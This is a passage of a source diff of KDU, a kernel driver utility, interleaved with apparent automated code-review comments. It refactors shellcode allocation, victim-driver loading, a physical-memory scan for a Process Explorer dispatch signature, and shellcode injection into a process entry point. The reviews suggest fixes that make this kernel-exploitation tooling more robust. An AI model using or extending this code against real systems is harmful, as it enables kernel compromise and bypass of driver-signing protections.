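Review bot: This branch rejects a `PreferPhysical` provider that lacks the physical-memory handlers even when its kernel VM pair is present, whereas the check in the previous hunk accepts the provider if either pair exists. If that difference is intentional (this action cannot fall back to the VM handlers), a comment above `if (Provider->LoadData->PreferPhysical) {` such as `// No fallback here: this action must use the handler pair the provider prefers.` would keep the next reader from "fixing" it. The `case` label this block belongs to is above the hunk.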
@@ -1002,7 +1051,9 @@ PKDU_CONTEXT WINAPI KDUProviderCreate(
Context->Victim = NULL;
}
else {
- Context->Victim = &g_KDUVictims[KDU_VICTIM_DEFAULT];
+ if (prov->LoadData->VictimId >= KDU_VICTIM_MAX)
+ prov->LoadData->VictimId = KDU_VICTIM_DEFAULT;
+ Context->Victim = &g_KDUVictims[prov->LoadData->VictimId];
}
PUNICODE_STRING CurrentDirectory = &NtCurrentPeb()->ProcessParameters->CurrentDirectory.DosPath;
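Review bot: The range check writes back into `prov->LoadData->VictimId`, silently rewriting the provider's load data instead of just selecting an index for this context; an out-of-range value is a table error that deserves at least an event message, and the clamp should not persist across contexts. Use a local: `ULONG victimId = prov->LoadData->VictimId; if (victimId >= KDU_VICTIM_MAX) victimId = KDU_VICTIM_DEFAULT; Context->Victim = &g_KDUVictims[victimId];`. `KDU_VICTIM_DEFAULT` is removed from kduprov.h in this same commit, so it and `KDU_VICTIM_MAX` presumably now live in a header not shown in the diff. The enclosing function starts above the hunk.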
diff --git a/Source/Hamakaze/kduprov.h b/Source/Hamakaze/kduprov.h
index 399f5cf..255d4ff 100644
--- a/Source/Hamakaze/kduprov.h
+++ b/Source/Hamakaze/kduprov.h
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2014 - 2022
+* (C) COPYRIGHT AUTHORS, 2014 - 2023
*
* TITLE: KDUPROV.H
*
-* VERSION: 1.28
+* VERSION: 1.30
*
-* DATE: 02 Dec 2022
+* DATE: 20 Mar 2023
*
* Provider support routines.
*
@@ -19,14 +19,6 @@
#pragma once
-//
-// Victim providers id
-//
-#define KDU_VICTIM_PROCEXP 0
-
-#define KDU_PROVIDER_DEFAULT KDU_PROVIDER_INTEL_NAL
-#define KDU_VICTIM_DEFAULT KDU_VICTIM_PROCEXP
-
//
// Providers abstraction interface.
//
@@ -220,13 +212,22 @@ typedef struct _KDU_CONTEXT {
typedef struct _KDU_PHYSMEM_ENUM_PARAMS {
_In_ BOOL bWrite;
+ _In_ HANDLE DeviceHandle;
+ _In_ provReadPhysicalMemory ReadPhysicalMemory;
+ _In_ provWritePhysicalMemory WritePhysicalMemory;
+
_In_opt_ PVOID pvPayload;
_In_opt_ ULONG cbPayload;
_Out_ SIZE_T ccPagesFound;
_Out_ SIZE_T ccPagesModified;
- _In_ PKDU_CONTEXT Context;
+ _In_ ULONG DispatchHandlerOffset;
+ _In_ ULONG DispatchHandlerPageOffset;
+ _In_ PVOID DispatchSignature;
+ _In_ ULONG DispatchSignatureLength;
+ _In_ ULONG JmpAddress;
+
} KDU_PHYSMEM_ENUM_PARAMS, * PKDU_PHYSMEM_ENUM_PARAMS;
ULONG KDUProvGetCount();
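Review bot: The new members of `KDU_PHYSMEM_ENUM_PARAMS` carry no comments, and the meaning and ownership of `DispatchSignature`/`DispatchSignatureLength`, the two offsets and `JmpAddress` are only recoverable by reading `VpQueryInformation` and `TestBrute`. Suggest trailing comments such as `_In_ HANDLE DeviceHandle; // provider device passed to the Read/WritePhysicalMemory handlers below`, `_In_ PVOID DispatchSignature; // byte pattern (not owned) of DispatchSignatureLength bytes compared inside each page`, and one stating that `DispatchHandlerPageOffset` is the in-page offset at which the comparison is made. Since `Context` was removed, it is worth noting that the structure is now self-contained and can be filled without a `KDU_CONTEXT`.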
diff --git a/Source/Hamakaze/main.cpp b/Source/Hamakaze/main.cpp
index e551d1c..f81a823 100644
--- a/Source/Hamakaze/main.cpp
+++ b/Source/Hamakaze/main.cpp
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2020 - 2022
+* (C) COPYRIGHT AUTHORS, 2020 - 2023
*
* TITLE: MAIN.CPP
*
-* VERSION: 1.28
+* VERSION: 1.30
*
-* DATE: 01 Dec 2022
+* DATE: 20 Mar 2023
*
* Hamakaze main logic and entrypoint.
*
@@ -523,7 +523,7 @@ int KDUMain()
OSVERSIONINFO osv;
#ifdef _DEBUG
- printf_s("[*] Debug Mode Run\r\n");
+ printf_s("[*] Debug Mode Run, several features (like a shellcode proper generation) will be unavailable\r\n");
#endif
FUNCTION_ENTER_MSG(__FUNCTION__);
@@ -640,7 +640,7 @@ VOID KDUIntroBanner()
{
IMAGE_NT_HEADERS* ntHeaders = RtlImageNtHeader(NtCurrentPeb()->ImageBaseAddress);
- printf_s("[#] Kernel Driver Utility v%lu.%lu.%lu (build %lu) started, (c)2020 - 2022 KDU Project\r\n"\
+ printf_s("[#] Kernel Driver Utility v%lu.%lu.%lu (build %lu) started, (c)2020 - 2023 KDU Project\r\n"\
"[#] Build at %s, header checksum 0x%lX\r\n"\
"[#] Supported x64 OS : Windows 7 and above\r\n",
KDU_VERSION_MAJOR,
diff --git a/Source/Hamakaze/res/SB_SMBUS_SDK.bin b/Source/Hamakaze/res/SB_SMBUS_SDK.bin
index 2ff5b50..60a7278 100644
Binary files a/Source/Hamakaze/res/SB_SMBUS_SDK.bin and b/Source/Hamakaze/res/SB_SMBUS_SDK.bin differ
diff --git a/Source/Hamakaze/res/Taigei32.bin b/Source/Hamakaze/res/Taigei32.bin
index ea679b8..eaa5995 100644
Binary files a/Source/Hamakaze/res/Taigei32.bin and b/Source/Hamakaze/res/Taigei32.bin differ
diff --git a/Source/Hamakaze/resource.rc b/Source/Hamakaze/resource.rc
index 9e6f0bd..3eae5a1 100644
--- a/Source/Hamakaze/resource.rc
+++ b/Source/Hamakaze/resource.rc
@@ -51,8 +51,8 @@ END
//
VS_VERSION_INFO VERSIONINFO
- FILEVERSION 1,2,8,2212
- PRODUCTVERSION 1,2,8,2212
+ FILEVERSION 1,3,0,2303
+ PRODUCTVERSION 1,3,0,2303
FILEFLAGSMASK 0x3fL
#ifdef _DEBUG
FILEFLAGS 0x1L
@@ -69,12 +69,12 @@ BEGIN
BEGIN
VALUE "CompanyName", "UG North"
VALUE "FileDescription", "Kernel Driver Utility"
- VALUE "FileVersion", "1.2.8.2212"
+ VALUE "FileVersion", "1.3.0.2303"
VALUE "InternalName", "Hamakaze.exe"
- VALUE "LegalCopyright", "Copyright (C) 2020 - 2022 KDU Project"
+ VALUE "LegalCopyright", "Copyright (C) 2020 - 2023 KDU Project"
VALUE "OriginalFilename", "Hamakaze.exe"
VALUE "ProductName", "KDU"
- VALUE "ProductVersion", "1.2.8.2212"
+ VALUE "ProductVersion", "1.3.0.2303"
END
END
BLOCK "VarFileInfo"
diff --git a/Source/Hamakaze/shellcode.cpp b/Source/Hamakaze/shellcode.cpp
index 00ad75e..8d9a08d 100644
--- a/Source/Hamakaze/shellcode.cpp
+++ b/Source/Hamakaze/shellcode.cpp
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2020 - 2022
+* (C) COPYRIGHT AUTHORS, 2020 - 2023
*
* TITLE: SHELLCODE.CPP
*
-* VERSION: 1.27
+* VERSION: 1.30
*
-* DATE: 16 Oct 2022
+* DATE: 20 Mar 2023
*
* Default driver mapping shellcode(s) implementation.
*
@@ -1328,8 +1328,8 @@ typedef VOID(NTAPI* pfnScLoaderRoutine)(
*
*/
NTSTATUS NTAPI ScDispatchRoutineDebugSelector(
- _In_ ULONG ShellVersion,
- _In_ PVOID ShellPtr,
+ _In_ ULONG ScVersion,
+ _In_ PVOID ScBuffer,
_In_ struct _DEVICE_OBJECT* DeviceObject,
_Inout_ struct _IRP* Irp)
{
@@ -1338,7 +1338,7 @@ NTSTATUS NTAPI ScDispatchRoutineDebugSelector(
pfnScLoaderRoutine LoaderRoutine;
} Routine;
- switch (ShellVersion) {
+ switch (ScVersion) {
case KDU_SHELLCODE_V4:
Routine.LoaderRoutine = (pfnScLoaderRoutine)ScLoaderRoutineV1;
break;
@@ -1354,12 +1354,12 @@ NTSTATUS NTAPI ScDispatchRoutineDebugSelector(
break;
}
- switch (ShellVersion) {
+ switch (ScVersion) {
case KDU_SHELLCODE_V4:
- Routine.LoaderRoutine(ShellPtr);
+ Routine.LoaderRoutine(ScBuffer);
return STATUS_SUCCESS;
default:
- return Routine.DispatchRoutine(DeviceObject, Irp, ShellPtr);
+ return Routine.DispatchRoutine(DeviceObject, Irp, ScBuffer);
}
}
@@ -1431,14 +1431,14 @@ ULONG_PTR ScResolveFunctionByName(
*
*/
SIZE_T ScGetViewSize(
- _In_ ULONG ShellVersion,
- _In_ PVOID ShellCodePtr
+ _In_ ULONG ScVersion,
+ _In_ PVOID ScBuffer
)
{
SIZE_T viewSize;
- PSHELLCODE pvShellCode = (PSHELLCODE)ShellCodePtr;
+ PSHELLCODE pvShellCode = (PSHELLCODE)ScBuffer;
- switch (ShellVersion) {
+ switch (ScVersion) {
case KDU_SHELLCODE_V4:
case KDU_SHELLCODE_V3:
case KDU_SHELLCODE_V2:
@@ -1460,28 +1460,28 @@ SIZE_T ScGetViewSize(
*
*/
DWORD ScSizeOf(
- _In_ ULONG ShellVersion,
+ _In_ ULONG ScVersion,
_Out_opt_ PULONG PayloadSize
)
{
ULONG payloadSize;
- switch (ShellVersion) {
- case KDU_SHELLCODE_V3:
- payloadSize = sizeof(PAYLOAD_HEADER_V3);
- break;
- case KDU_SHELLCODE_V2:
- payloadSize = sizeof(PAYLOAD_HEADER_V2);
- break;
- case KDU_SHELLCODE_V4:
- case KDU_SHELLCODE_V1:
- default:
- payloadSize = sizeof(PAYLOAD_HEADER_V1);
- break;
- }
-
- if (PayloadSize)
+ if (PayloadSize) {
+ switch (ScVersion) {
+ case KDU_SHELLCODE_V3:
+ payloadSize = sizeof(PAYLOAD_HEADER_V3);
+ break;
+ case KDU_SHELLCODE_V2:
+ payloadSize = sizeof(PAYLOAD_HEADER_V2);
+ break;
+ case KDU_SHELLCODE_V4:
+ case KDU_SHELLCODE_V1:
+ default:
+ payloadSize = sizeof(PAYLOAD_HEADER_V1);
+ break;
+ }
*PayloadSize = payloadSize;
+ }
return sizeof(SHELLCODE);
}
@@ -1495,13 +1495,13 @@ DWORD ScSizeOf(
*
*/
BOOL ScBuildShellImportDebug(
- _In_ ULONG ShellVersion,
- _In_ PVOID ShellPtr
+ _In_ ULONG ScVersion,
+ _In_ PVOID ScBuffer
)
{
- SHELLCODE* ShellCode = (SHELLCODE*)ShellPtr;
+ SHELLCODE* ShellCode = (SHELLCODE*)ScBuffer;
- switch (ShellVersion) {
+ switch (ScVersion) {
case KDU_SHELLCODE_V4:
case KDU_SHELLCODE_V3:
@@ -1535,8 +1535,8 @@ BOOL ScBuildShellImportDebug(
*
*/
BOOL ScBuildShellImport(
- _In_ ULONG ShellVersion,
- _In_ PVOID ShellPtr,
+ _In_ ULONG ScVersion,
+ _In_ PVOID ScBuffer,
_In_ ULONG_PTR KernelBase,
_In_ ULONG_PTR KernelImage
)
@@ -1545,7 +1545,7 @@ BOOL ScBuildShellImport(
ULONG i;
- SHELLCODE* ShellCode = (SHELLCODE*)ShellPtr;
+ SHELLCODE* ShellCode = (SHELLCODE*)ScBuffer;
#ifdef ENABLE_DBGPRINT
pfnDbgPrint DbgPrintPtr;
@@ -1564,7 +1564,7 @@ BOOL ScBuildShellImport(
"KeSetEvent"
};
- UNREFERENCED_PARAMETER(ShellVersion);
+ UNREFERENCED_PARAMETER(ScVersion);
do {
@@ -1619,16 +1619,16 @@ BOOL ScBuildShellImport(
*
*/
HANDLE ScCreateReadyEvent(
- _In_ ULONG ShellVersion,
- _In_ PVOID ShellPtr
+ _In_ ULONG ScVersion,
+ _In_ PVOID ScBuffer
)
{
HANDLE hReadyEvent;
- SHELLCODE* ShellCode = (SHELLCODE*)ShellPtr;
+ SHELLCODE* ShellCode = (SHELLCODE*)ScBuffer;
hReadyEvent = CreateEvent(NULL, TRUE, FALSE, NULL);
- switch (ShellVersion) {
+ switch (ScVersion) {
case KDU_SHELLCODE_V4:
case KDU_SHELLCODE_V3:
case KDU_SHELLCODE_V2:
@@ -1748,10 +1748,12 @@ BOOLEAN ScStoreVersionSpecificData(
*
*/
VOID ScFree(
- _In_ PVOID ShellPtr
+ _In_ PVOID ScBuffer,
+ _In_ ULONG ScSize
)
{
- VirtualFree(ShellPtr, 0, MEM_RELEASE);
+ VirtualUnlock(ScBuffer, ScSize);
+ VirtualFree(ScBuffer, 0, MEM_RELEASE);
}
/*
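Review bot: `ScFree` now unlocks before releasing, but neither it nor `ScAllocate` says why the shellcode buffer is locked into the working set, and the `VirtualUnlock` result is discarded. A comment on that line such as `// Undo the VirtualLock done in ScAllocate; the region is released right after, so a failed unlock is not acted on.` records the pairing, and the reason for locking belongs next to the `VirtualLock` call in `ScAllocate`. Callers must now pass the same size that was locked; the header prototype in shellcode.h should say so.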
@@ -1806,7 +1808,7 @@ PVOID ScAllocate(
_Out_ PULONG ShellSize
)
{
- SIZE_T scSize;
+ DWORD scSize;
PSHELLCODE pvShellCode = NULL;
PVOID pvBootstrap;
@@ -1855,6 +1857,11 @@ PVOID ScAllocate(
if (pvShellCode == NULL)
return NULL;
+ if (!VirtualLock(pvShellCode, scSize)) {
+ VirtualFree(pvShellCode, 0, MEM_RELEASE);
+ return NULL;
+ }
+
pvBootstrap = pvShellCode->BootstrapCode;
switch (ShellVersion) {
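Review bot: The new `VirtualLock` failure path frees the buffer and returns NULL without any diagnostic, unlike the other failure paths of `ScAllocate` (the import-resolution failure in a later hunk calls `supPrintfEvent(kduEventError, ...)`), so the caller only sees a NULL with no explanation. Add `supPrintfEvent(kduEventError, "[!] Failed to lock shellcode buffer, GetLastError() = %lu\r\n", GetLastError());` before the return, and a one-line why-comment above the call, since the reason the pages must stay resident is stated nowhere in the diff (presumably to keep the buffer physically backed — confirm). `VirtualLock` can fail when the request exceeds the process working-set limits, so a large `scSize` is a realistic way to hit this path. The function begins above the hunk.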
@@ -1873,7 +1880,7 @@ PVOID ScAllocate(
// Build initial loader code part.
//
if (!ScBuildInitCodeForVersion(ShellVersion, pvShellCode)) {
- VirtualFree(pvShellCode, 0, MEM_RELEASE);
+ ScFree(pvShellCode, scSize);
return NULL;
}
@@ -1914,7 +1921,7 @@ PVOID ScAllocate(
KernelBase,
KernelImage))
{
- VirtualFree(pvShellCode, 0, MEM_RELEASE);
+ ScFree(pvShellCode, scSize);
supPrintfEvent(kduEventError,
"[!] Failed to resolve base shellcode import\r\n");
diff --git a/Source/Hamakaze/shellcode.h b/Source/Hamakaze/shellcode.h
index 9b81b9b..4717d02 100644
--- a/Source/Hamakaze/shellcode.h
+++ b/Source/Hamakaze/shellcode.h
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2020 - 2022
+* (C) COPYRIGHT AUTHORS, 2020 - 2023
*
* TITLE: SHELLCODE.H
*
-* VERSION: 1.20
+* VERSION: 1.30
*
-* DATE: 15 Feb 2022
+* DATE: 20 Mar 2023
*
* Default driver mapping shellcode(s) prototypes and definitions.
*
@@ -64,11 +64,11 @@ typedef struct _PAYLOAD_HEADER_V3 {
} PAYLOAD_HEADER_V3, * PPAYLOAD_HEADER_V3;
SIZE_T ScGetViewSize(
- _In_ ULONG ShellVersion,
- _In_ PVOID ShellCodePtr);
+ _In_ ULONG ScVersion,
+ _In_ PVOID ScBuffer);
DWORD ScSizeOf(
- _In_ ULONG ShellVersion,
+ _In_ ULONG ScVersion,
_Out_opt_ PULONG PayloadSize);
ULONG ScSizeOfProc(
@@ -79,8 +79,8 @@ BOOLEAN ScCreateFixedUnicodeString(
_In_ PCWSTR SourceString);
HANDLE ScCreateReadyEvent(
- _In_ ULONG ShellVersion,
- _In_ PVOID ShellPtr);
+ _In_ ULONG ScVersion,
+ _In_ PVOID ScBuffer);
BOOLEAN ScStoreVersionSpecificData(
_In_ PKDU_CONTEXT Context,
@@ -102,7 +102,8 @@ PVOID ScGetBootstrapLdr(
_Out_opt_ PULONG Size);
VOID ScFree(
- _In_ PVOID ShellPtr);
+ _In_ PVOID ScBuffer,
+ _In_ ULONG ScSize);
PVOID ScAllocate(
_In_ ULONG ShellVersion,
diff --git a/Source/Hamakaze/sig.h b/Source/Hamakaze/sig.h
index cf80a4c..0ff541e 100644
--- a/Source/Hamakaze/sig.h
+++ b/Source/Hamakaze/sig.h
@@ -1,14 +1,14 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2020 - 2022
+* (C) COPYRIGHT AUTHORS, 2020 - 2023
*
* TITLE: SIG.H
*
-* VERSION: 1.28
+* VERSION: 1.30
*
-* DATE: 01 Dec 2022
+* DATE: 20 Mar 2023
*
-* Signatures header file.
+* Signatures definition header file.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
@@ -21,7 +21,8 @@
//
// Process Explorer dispatch signature.
//
-static unsigned char ProcExpSignature[] = {
+
+static unsigned char g_ProcExpSig[] = {
0x48, 0x89, 0x5C, 0x24, 0x08, 0x57, 0x48, 0x81, 0xEC, 0x90, 0x00,
0x00, 0x00, 0x48, 0x8B, 0xFA, 0x33, 0xDB, 0x48, 0x8B, 0xD1, 0x48,
0x8B, 0x8F, 0xB8, 0x00, 0x00, 0x00, 0x4C, 0x8B, 0x47, 0x18, 0x48,
diff --git a/Source/Hamakaze/sup.cpp b/Source/Hamakaze/sup.cpp
index be8f946..7fe4fd2 100644
--- a/Source/Hamakaze/sup.cpp
+++ b/Source/Hamakaze/sup.cpp
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2020 - 2022
+* (C) COPYRIGHT AUTHORS, 2020 - 2023
*
* TITLE: SUP.CPP
*
-* VERSION: 1.28
+* VERSION: 1.30
*
-* DATE: 07 Dec 2022
+* DATE: 20 Mar 2023
*
* Program global support routines.
*
@@ -597,6 +597,27 @@ BOOL supRegDeleteKeyRecursive(
return supxDeleteKeyRecursive(hKeyRoot, szKeyName);
}
+/*
+* supRegWriteValueDWORD
+*
+* Purpose:
+*
+* Write DWORD value to the registry.
+*
+*/
+NTSTATUS supRegWriteValueDWORD(
+ _In_ HANDLE RegistryHandle,
+ _In_ LPCWSTR ValueName,
+ _In_ DWORD ValueData
+)
+{
+ UNICODE_STRING valueName;
+
+ RtlInitUnicodeString(&valueName, ValueName);
+ return NtSetValueKey(RegistryHandle, &valueName, 0, REG_DWORD,
+ (PVOID)&ValueData, sizeof(DWORD));
+}
+
/*
* supRegWriteValueString
*
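Review bot: The `Purpose:` header of `supRegWriteValueDWORD` does not state its contract: `ValueName` must be NUL-terminated because `RtlInitUnicodeString` measures it, and the return value is the raw `NtSetValueKey` status. Suggest extending the block with `* ValueName must be a NUL-terminated wide string. Returns the NtSetValueKey status.` Also prefer `sizeof(ValueData)` over `sizeof(DWORD)` so the length tracks the parameter type.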
@@ -913,7 +934,7 @@ NTSTATUS supOpenDriverEx(
0,
0,
FILE_OPEN,
- 0,
+ FILE_NON_DIRECTORY_FILE | FILE_SYNCHRONOUS_IO_NONALERT,
NULL,
0);
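Review bot: `FILE_SYNCHRONOUS_IO_NONALERT` is only valid when `SYNCHRONIZE` is present in the desired access of the same open; otherwise the open fails with STATUS_INVALID_PARAMETER. This commit adds `SYNCHRONIZE` to several call sites (the victim table and two calls in kduprov.cpp), but `supOpenDriverEx` still relies on every caller remembering it, and any caller still passing the old `WRITE_DAC | GENERIC_WRITE | GENERIC_READ` mask will now fail to open its device. Since the access-mask argument is above the hunk, the robust fix is to OR `SYNCHRONIZE` into the mask where it is forwarded inside `supOpenDriverEx`, or at least to document the requirement on the prototype in sup.h.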
@@ -2320,7 +2341,7 @@ PVOID supGetEntryPointForMappedFile(
*/
NTSTATUS supInjectPayload(
_In_ PVOID pvTargetImage,
- _In_ PVOID pvShellCode,
+ _In_ PVOID pbShellCode,
_In_ ULONG cbShellCode,
_In_ LPWSTR lpTargetModule,
_Out_ PHANDLE phZombieProcess
@@ -2467,7 +2488,7 @@ NTSTATUS supInjectPayload(
}
RtlCopyMemory(RtlOffsetToPointer(pvLocalBase, optHeader->AddressOfEntryPoint),
- pvShellCode,
+ pbShellCode,
cbShellCode);
ResumeThread(processInfo.hThread);
diff --git a/Source/Hamakaze/sup.h b/Source/Hamakaze/sup.h
index 635a2ce..af98776 100644
--- a/Source/Hamakaze/sup.h
+++ b/Source/Hamakaze/sup.h
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2020 - 2022
+* (C) COPYRIGHT AUTHORS, 2020 - 2023
*
* TITLE: SUP.H
*
-* VERSION: 1.28
+* VERSION: 1.30
*
-* DATE: 21 Nov 2022
+* DATE: 20 Mar 2023
*
* Support routines header file.
*
@@ -235,6 +235,11 @@ BOOL supManageDummyDll(
ULONG supSelectNonPagedPoolTag(
VOID);
+NTSTATUS supRegWriteValueDWORD(
+ _In_ HANDLE RegistryHandle,
+ _In_ LPCWSTR ValueName,
+ _In_ DWORD ValueData);
+
NTSTATUS supRegWriteValueString(
_In_ HANDLE RegistryHandle,
_In_ LPCWSTR ValueName,
@@ -293,7 +298,7 @@ PVOID supGetEntryPointForMappedFile(
NTSTATUS supInjectPayload(
_In_ PVOID pvTargetImage,
- _In_ PVOID pvShellCode,
+ _In_ PVOID pbShellCode,
_In_ ULONG cbShellCode,
_In_ LPWSTR lpTargetModule,
_Out_ PHANDLE phZombieProcess);
diff --git a/Source/Hamakaze/tests.cpp b/Source/Hamakaze/tests.cpp
index fa64147..797a1ab 100644
--- a/Source/Hamakaze/tests.cpp
+++ b/Source/Hamakaze/tests.cpp
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2020 - 2022
+* (C) COPYRIGHT AUTHORS, 2020 - 2023
*
* TITLE: TESTS.CPP
*
-* VERSION: 1.28
+* VERSION: 1.30
*
-* DATE: 01 Dec 2022
+* DATE: 20 Mar 2023
*
* KDU tests.
*
@@ -89,20 +89,19 @@ BOOL WINAPI TestPhysMemEnumCallback(
{
PKDU_PHYSMEM_ENUM_PARAMS Params = (PKDU_PHYSMEM_ENUM_PARAMS)UserContext;
- PKDU_CONTEXT Context = Params->Context;
- ULONG signatureSize = sizeof(ProcExpSignature);
+ ULONG signatureSize = Params->DispatchSignatureLength;
BYTE buffer[PAGE_SIZE];
RtlSecureZeroMemory(&buffer, sizeof(buffer));
- if (Context->Provider->Callbacks.ReadPhysicalMemory(Context->DeviceHandle,
+ if (Params->ReadPhysicalMemory(Params->DeviceHandle,
Address,
&buffer,
PAGE_SIZE))
{
- if (signatureSize == RtlCompareMemory(ProcExpSignature,
- RtlOffsetToPointer(buffer, PE152_DISPATCH_PAGE_OFFSET),
+ if (signatureSize == RtlCompareMemory(Params->DispatchSignature,
+ RtlOffsetToPointer(buffer, Params->DispatchHandlerPageOffset),
signatureSize))
{
printf_s("\t Found code at address 0x%llX\r\n", Address);
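Review bot: `RtlCompareMemory` reads `signatureSize` bytes starting at `buffer + Params->DispatchHandlerPageOffset`, and neither value is checked against `PAGE_SIZE`; the offset used to be a compile-time constant but is now computed at run time (`ptrCode & 0xfff` in `VpQueryInformation`), so a signature located near the end of a page turns this into a read past the end of the stack buffer. Guard the comparison: `if (Params->DispatchHandlerPageOffset + signatureSize <= PAGE_SIZE && signatureSize == RtlCompareMemory(...))`. The callback body continues past the hunk.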
@@ -116,20 +115,37 @@ BOOL WINAPI TestPhysMemEnumCallback(
VOID TestBrute(PKDU_CONTEXT Context)
{
KDU_PHYSMEM_ENUM_PARAMS params;
+ VICTIM_IMAGE_INFORMATION vi;
+ HANDLE victimDeviceHandle = NULL;
- params.bWrite = FALSE;
- params.cbPayload = 0;
- params.pvPayload = NULL;
- params.Context = Context;
- params.ccPagesFound = 0;
- params.ccPagesModified = 0;
+ if (VpCreate(Context->Victim, Context->ModuleBase, &victimDeviceHandle, NULL, NULL)) {
- if (supEnumeratePhysicalMemory(TestPhysMemEnumCallback, ¶ms)) {
+ RtlSecureZeroMemory(&vi, sizeof(vi));
+ VpQueryInformation(Context->Victim, VictimImageInformation, &vi, sizeof(vi));
- printf_s("[+] Number of pages found: %llu\r\n", params.ccPagesFound);
+ params.DeviceHandle = Context->DeviceHandle;
+ params.ReadPhysicalMemory = Context->Provider->Callbacks.ReadPhysicalMemory;
+ params.WritePhysicalMemory = Context->Provider->Callbacks.WritePhysicalMemory;
+ params.DispatchSignature = Context->Victim->Data.DispatchSignature;
+ params.DispatchSignatureLength = Context->Victim->Data.DispatchSignatureLength;
+
+ params.DispatchHandlerOffset = vi.DispatchOffset;
+ params.DispatchHandlerPageOffset = vi.DispatchPageOffset;
+ params.JmpAddress = vi.JumpValue;
+
+ params.bWrite = FALSE;
+ params.cbPayload = 0;
+ params.pvPayload = NULL;
+ params.ccPagesFound = 0;
+ params.ccPagesModified = 0;
+
+ if (supEnumeratePhysicalMemory(TestPhysMemEnumCallback, ¶ms)) {
+
+ printf_s("[+] Number of pages found: %llu\r\n", params.ccPagesFound);
+
+ }
}
-
}
VOID KDUTest()
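Review bot: The result of `VpQueryInformation` is ignored, so when it fails `vi` stays zeroed and the enumeration runs with a zero page offset and `JmpAddress`, silently comparing the signature at the wrong place in every page. Wrap the parameter setup and enumeration in `if (VpQueryInformation(Context->Victim, VictimImageInformation, &vi, sizeof(vi))) {` and print an error event otherwise. The victim created by `VpCreate` is also never released in this function — there is no `VpRelease` and `victimDeviceHandle` is never closed before the closing brace — so the test leaves the victim driver loaded and the handle open.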
@@ -141,7 +157,7 @@ VOID KDUTest()
RtlSecureZeroMemory(&Buffer, sizeof(Buffer));
- Context = KDUProviderCreate(KDU_PROVIDER_AMD_RYZENMASTER,
+ Context = KDUProviderCreate(KDU_PROVIDER_WINRING0,
FALSE,
NT_WIN7_SP1,
KDU_SHELLCODE_V1,
diff --git a/Source/Hamakaze/victim.cpp b/Source/Hamakaze/victim.cpp
index fb0dc7b..e6db1b9 100644
--- a/Source/Hamakaze/victim.cpp
+++ b/Source/Hamakaze/victim.cpp
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2018 - 2022
+* (C) COPYRIGHT AUTHORS, 2018 - 2023
*
* TITLE: VICTIM.CPP
*
-* VERSION: 1.28
+* VERSION: 1.30
*
-* DATE: 01 Dec 2022
+* DATE: 20 Mar 2023
*
* Victim support routines.
*
@@ -30,10 +30,12 @@
BOOL VpCreate(
_Inout_ PKDU_VICTIM_PROVIDER Context,
_In_opt_ HINSTANCE ModuleBase,
- _Out_opt_ PHANDLE VictimHandle
+ _Out_opt_ PHANDLE VictimHandle,
+ _In_opt_ pfnLoadDriverCallback Callback,
+ _In_opt_ PVOID CallbackParam
)
{
- supPrintfEvent(kduEventInformation,
+ supPrintfEvent(kduEventInformation,
"[+] Processing victim \"%ws\" driver\r\n",
Context->Desc);
@@ -42,7 +44,10 @@ BOOL VpCreate(
Context->Name,
Context->ResourceId,
Context->DesiredAccess,
- VictimHandle);
+ VictimHandle,
+ &Context->Data.VictimImage,
+ Callback,
+ CallbackParam);
}
/*
@@ -67,7 +72,10 @@ BOOL VpRelease(
*VictimHandle = NULL;
}
}
-
+
+ if (Context->Data.VictimImage)
+ VirtualFree(Context->Data.VictimImage, 0, MEM_RELEASE);
+
return Context->Callbacks.Release(Context->Name);
}
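Review bot: `Context->Data.VictimImage` is freed but not reset, leaving a dangling pointer in the victim provider entry; if the same entry is ever released twice, or re-created through a path that does not map an image, the next release becomes a double free. Add `Context->Data.VictimImage = NULL;` right after the `VirtualFree` call. The beginning of `VpRelease` is above the hunk.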
@@ -84,8 +92,8 @@ VOID VpExecutePayload(
_Out_opt_ PHANDLE VictimHandle
)
{
- Context->Callbacks.Execute(Context->Name,
- Context->DesiredAccess,
+ Context->Callbacks.Execute(Context->Name,
+ Context->DesiredAccess,
VictimHandle);
}
@@ -98,12 +106,14 @@ VOID VpExecutePayload(
* This routine will try to force unload driver on loading if Force parameter set to TRUE.
*
*/
-BOOL VppLoadUnloadDriver(
+NTSTATUS VppLoadUnloadDriver(
_In_ LPCWSTR Name,
_In_ LPCWSTR ImagePath,
_In_ BOOLEAN Force,
_In_ BOOLEAN Unload,
- _Out_opt_ NTSTATUS* ErrorStatus)
+ _In_opt_ pfnLoadDriverCallback Callback,
+ _In_opt_ PVOID CallbackParam
+ )
{
NTSTATUS ntStatus;
@@ -111,13 +121,10 @@ BOOL VppLoadUnloadDriver(
ntStatus = supUnloadDriver(Name, TRUE);
}
else {
- ntStatus = supLoadDriver(Name, ImagePath, Force);
+ ntStatus = supLoadDriverEx(Name, ImagePath, Force, Callback, CallbackParam);
}
- if (ErrorStatus)
- *ErrorStatus = ntStatus;
-
- return (NT_SUCCESS(ntStatus));
+ return ntStatus;
}
/*
@@ -165,8 +172,14 @@ BOOL VpCreateCallback(
_In_ LPCWSTR Name, //same as device name
_In_ ULONG ResourceId,
_In_ ACCESS_MASK DesiredAccess,
- _Out_opt_ PHANDLE VictimHandle)
+ _Out_opt_ PHANDLE VictimHandle,
+ _Out_opt_ PVOID* VictimImage,
+ _In_opt_ pfnLoadDriverCallback Callback,
+ _In_opt_ PVOID CallbackParam
+)
{
+ BOOL bResult = FALSE;
+ NTSTATUS ntStatus;
PBYTE drvBuffer = NULL;
ULONG resourceSize = 0;
LPWSTR driverFileName = NULL;
@@ -174,37 +187,45 @@ BOOL VpCreateCallback(
if (VictimHandle)
*VictimHandle = NULL;
+ if (VictimImage)
